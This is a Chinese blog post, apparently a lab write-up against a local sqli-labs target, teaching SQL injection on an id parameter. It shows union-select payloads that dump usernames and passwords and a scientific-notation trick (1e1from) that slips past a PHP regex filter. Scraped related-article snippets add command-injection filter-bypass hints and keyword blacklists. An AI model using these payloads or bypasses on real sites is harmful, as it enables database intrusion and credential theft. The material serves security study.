绕过正则实现SQL注入

最新推荐文章于 2024-01-26 08:00:00 发布
最新推荐文章于 2024-01-26 08:00:00 发布
阅读量1.6k 收藏 2
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 安全 文章标签: sql 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/H2223/article/details/125946801

 

 %27是'        %20是空格        --+是为了将后面的代码注释掉

首先使用order by 来查看有多少列

?id=1%27%20order%20by%204--+ 发现4报错了,改成3后就恢复了,说明有3列

联合查询1,2,3

?id=-1%27%20union%20select%201,2,3--+

 发现数据出在2,3上了

只要输入查询语句就可以获得所有数据

 注入语句:http://127.0.0.1/sql/less-1/?id=-1%27%20union%20select%201,(select%20group_concat(username,0x3a,password)from%20users),3--+

 但在php文件中加入过滤正则

if (preg_match('/select\b[\s\S]*\bfrom/is',$id)){
	die('sql injection');
}

 被正则表达式捕获了

该正则表达式匹配了select后与form前的单词边界,select和from中间的所有字符

但sql注入要查询数据必须要有select与from,想要绕过正则表达式就要select后或form前有字符

 

 这样是匹配不上了,但是SQL语法也错了

mysql是支持科学计数法的(1e1)

 

这样既可以绕开正则又不会语法错误

http://127.0.0.1/sql/less-1/?id=-1%27%20union%20select%201,group_concat(username,0x3a,password),1e1from%20users--+

 

 注意1e1会让表格多一列,所以要把3去掉

sql注入绕过正则表达式匹配和回溯机制
weixin_54246834的博客
07-23 1063
有限状态自动机”,其拥有有限数量的状态,每个状态可以迁移到零个或多个状态,输入字串决定执行哪个状态的迁移。而常见的正则引擎,又被细分为DFA(确定性有限状态自动机)与NFA(非确定性有限状态自动机)。他们匹配输入的过程分别是DFA从起始状态开始,一个字符一个字符地读取输入串,并根据正则来一步步确定至下一个转移状态,直到匹配不上或走完整个输入NFA从起始状态开始,一个字符一个字符地读取输入串,并与正则表达式进行匹配,如果匹配不上,则进行回溯,尝试其他状态。...
SQL注入正则表达式
weixin_45634365的博客
02-17 4860
SQL注入SQL注入攻击的本质,就是把用户输入的数据当做代码执行。 这里有两个关键的条件: 1、用户能够控制输入 2、原本程序要执行的代码,拼接了用户输入的数据然后进行执行 1998年一名叫做rfp的黑客发表了一篇关于SQL注入的文章 首先查看登录处理代码: <meta charset='utf-8'> <?php @$username = $_REQUEST['username']; #用户名 @$password = $_REQUEST['password']; #密码 $conn
绕过函数方法
qq_50613938的博客
11-03 493
127.0.0.1 & ls ——ll ;查看本地目录 当某一些字符被过滤掉,绕过 “;”分隔符可以使用%0a代替 |,||,&,&&,五个管道符 不加通配符的like可以用来当做=号使用 空格键;/**/ () 回车(url编码中的%0a) `(tap键上面的按钮) tap 两个空格 %0a代替换行,%09代替TAB键(因为flag被过滤了,所以我们通过TAB来补全flag_is_here) %5c代替\(用\来分隔开cat,因为cat也被过滤了qwq)%27是单引号 ca
sql注入绕过正则盲注绕过
yggcwhat
05-08 647
sql注入绕过正则盲注绕过
SQL注入绕过正则及无列名注入
热门推荐
钟言的博客
12-19 1万+
本篇为SQL注入绕过正则表达式及无列名注入,详细内容包含了select\bNslS]bfrom正则 科学计数法绕过 过滤information 四、无列名注入 1、利用 join-using 注列名 2、无列名查询 五、报错注入7大常用函数 1.ST LatFromGeoHash() (mysql>=5.7.x)payload 2.ST LongFromGeoHash (mysql>=5.7.x) payload 3.GTID (MySQL >= 5.6.X - 显错
正则表达式防止SQL注入
温水中的青蛙
08-20 2867
本来对正则表达式不是很了解,但由于项目需要,项目主要没有采用存储过程方式来存储 SQL语句,所以很有可能被黑客用SQL注入攻击,现在就在网上找了找解决办法,在业务层来过滤SQL语句,防止SQL注入攻击,主要是采用了正则表达式,因为正则表达式对字符串的操作是很强大的.首先用一个Validate()类来封装正则表达式和相关操作:    //验证是否有SQL注入字符    private bool Va
正则表达式防SQL注入函数
小丸子的专栏
10-08 8187
<br />       最近研究上了正则表达式,正则表达式是一种匹配字符串的工具,不过它非常强大,效率也很高。php虽然有庞大的函数库,但如果单靠php的系统函数写一个防SQL注入函数的函数就未免有点繁琐了。下面这个是我自己写的防SQL注入函数,可以去除特殊符号+*`/-$#^~!@#$%&[]'"、空格、换行符、制表符。应该可以过滤恶意sql查询语句和万能登录语句的输入。<br /> <br />function clean($str)<br />{<br /> $str=trim($str);<br
基于正则sql注入防御的绕过技巧.pdf
01-02
例如,在安全狗最新版中,攻击者可以使用 /*a/a*/ 来绕过正则表达式的匹配,并执行恶意SQL代码。 2. 长度类绕过技巧 长度类绕过技巧是指攻击者使用特殊的字符来绕过正则表达式的匹配。例如,攻击者可以使用 a=/*--...
SQL注入:联合查询的三个绕过技巧
qq_68163788的博客
01-26 3378
SQL注入中,可以利用科学计数法来绕过对输入的限制。例如,可以使用科学计数法来绕过对字符串长度的限制,通过将字符串拆分成多个部分并使用科学计数法来表示。此外,还可以利用数据库的特定特性或语法来替代原始的查询语句,从而执行联合查询或其他恶意操作。另外,还可以尝试利用无列名注入的技巧,通过在原始查询中使用通配符或其他方式来绕过对列名的限制,从而执行恶意操作。
SQL注入绕过的技巧总结
12-14
sql注入在很早很早以前是很常见的一个漏洞。后来随着安全水平的提高,sql注入已经很少能够看到了。但是在,还有很多网站带着sql注入漏洞在运行。稍微有点安全意识的朋友应该懂得要做一下sql注入过滤。   SQL注入绕过技巧有很多,具体的绕过技巧需要看具体的环境,而且很多的绕过方法需要有一个实际的环境,好是你在渗透测试的过程中遇到的环境,否则如果仅仅是自己凭空想,那显然是不靠谱的。这篇文章是总结我在遇到的CTF题目或者是渗透环境的过程中,所使用到的sql注入绕过技巧,这篇文章随着自己的见识和能力不断的提升,所总结的方法也会变多。   一、引号绕过   会使用到引号的地方是在于后的whe
sql注入(三)绕过方法及防御手段
m0_63306943的博客
05-02 8574
1)如果 waf 过滤了逗号,并且只能盲注,在取子串的几个函数中,有一个替代逗号的方法就是使用 from for ,其中 pos 代表从 pos 个开始读取 len 长度的子串。rlike 模糊匹配,只要字段的值中存在要查找的 部分 就会被选择出来,用来取代 = 时,rlike 的用法和上面的 like 一样,没有通配符效果和 = 一样。因为这些sql命令的执行, 必须先的通过语法分析,生成执行计划,既然语法分析已经完成,已经预编译过了,那么后面输入的参数,是绝对不可能作为sql命令来执行的,
jsp工程防止外部注入_防止 jsp被sql注入的五种方法
weixin_39626180的博客
01-27 286
一、SQL注入简介SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编程时的疏忽,通过SQL语句,实现无帐号登录,甚至篡改数据库。二、SQL注入攻击的总体思路1.寻找到SQL注入的位置2.判断服务器类型和后台数据库类型3.针对不通的服务器和数据库特点进行SQL注入攻击三、SQL注入攻击实例比如在一个登录界面,要求输入用户名和密码:可以这样输入实现免帐号登录...
c# .net 正则表达式验证sql非法字符串,防止sql注入
mcsoft_lzm的专栏
10-26 3383
老铁,就一句代码 Regex.IsMatch(sWord.ToLower(), "/response|group_concat|cmd|sysdate|xor|declare|db_name|char| and| or|truncate| asc| desc|drop |table|count|from|select|insert|update|delete|union|into|load_fi...
绕过正则SQL注入
白帽子凯哥聊黑客
07-13 213
在 commonUserName 参数后不断添加单引号,返回包中的“data”数值呈规律性变化,判断此处存在 SQL 注入。POC 变形:commonUserName=123'or--+777777777777%0aUSER%0alike'A%图二 添加 1 个单引号,返回 data=2。图三 添加 2 个单引号,返回 data=0。图四 添加 3 个单引号,返回 data=2。图三 爆破 USER 第一位字母。
php 防注入 正则,SQL注入基础五--PHP正则表达式
weixin_29325007的博客
03-09 333
什么是正则表达式正则表达式又称规则表达式。(在代码中常简写为regex.regexp或RE),计算机科学的一个概念。正则表达式通常被用来检索。替换那些符合某个规则的文本。正则表达式的特点是:灵活性、逻辑性和功能性非常强;可以迅速地用极简单的方式达到字符串的复制控制;对于刚接触的人来说,比较难懂正则表达式的用途:判断字符串是否合某一规则(判断是否合手机号、邮箱规则)从一个字符串中找出符合规则的所有子...
正则表达式
weixin_47090614的博客
08-20 172
后端基础正则表达式 万能密码 => sql注入漏洞 sql注入:用户输入的语句被当作sql语句进行执行 万能密码例子:select*from admin where username = ‘admin’ and password = ’ ’ or 1=1 limit 1,1 --qwe’ 万能密码例子源代码:select*from admin where username = ‘username′andpassword=′username' and password = 'username′andpa
web安全SQL注入绕过技术(三)
Longwaer
02-25 4016
学习掌握SQL注入绕过技术,更好的用于日常渗透测试中使用。
java使用正则防止sql注入
最新发布
01-03
### 使用Java和正则表达式预防SQL注入 为了防止SQL注入攻击,在处理用户输入时应严格验证并过滤掉潜在危险字符。通过应用正则表达式可以有效地识别并阻止恶意字符串进入数据库查询语句中。 对于敏感字段如用户名、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值